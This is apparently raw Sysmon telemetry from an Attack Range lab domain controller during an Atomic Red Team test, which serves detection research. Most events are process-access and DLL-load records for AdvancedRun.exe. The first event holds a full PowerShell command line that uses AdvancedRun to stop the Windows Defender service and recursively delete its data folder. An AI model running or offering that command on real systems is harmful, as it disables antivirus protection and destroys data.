154100x80000000000000003966866Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:50:57.927{834264DD-F281-61EA-1E04-000000002702}1028C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe /EXEFilename \""C:\Windows\System32\sc.exe\"" /WindowState 0 /CommandLine \""stop WinDefend\"" /StartDirectory \""\"" /RunAs 8 /Run C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe \""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe\"" /WindowState 0 /CommandLine \""rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse\"" /StartDirectory \""\"" /RunAs 8 /Run} 
C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{834264DD-DB10-61EA-4958-090000000000}0x958492HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ATTACKRANGE\Administrator 534500x80000000000000003955716Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:32:19.984{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeATTACKRANGE\Administrator 10341000x80000000000000003955241Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.979{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955240Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:46.979{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955239Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.979{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955238Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955237Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955236Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 
10341000x80000000000000003955235Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:46.964{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955179Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955178Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955177Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955176Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955175Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955174Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 
10341000x80000000000000003955173Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:29.675{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955114Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955113Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955112Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62725|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955111Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285540C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955110Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955109Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955106Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.253{834264DD-DB11-61EA-9500-000000002702}4285468C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955105Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.237{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955104Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955103Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955102Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955101Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000003955100Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.237{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator 734700x80000000000000003955099Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:31:18.144{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955098Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.144{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955097Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator 734700x80000000000000003955096Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:31:18.065{834264DD-EDE6-61EA-9503-000000002702}6116C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® 
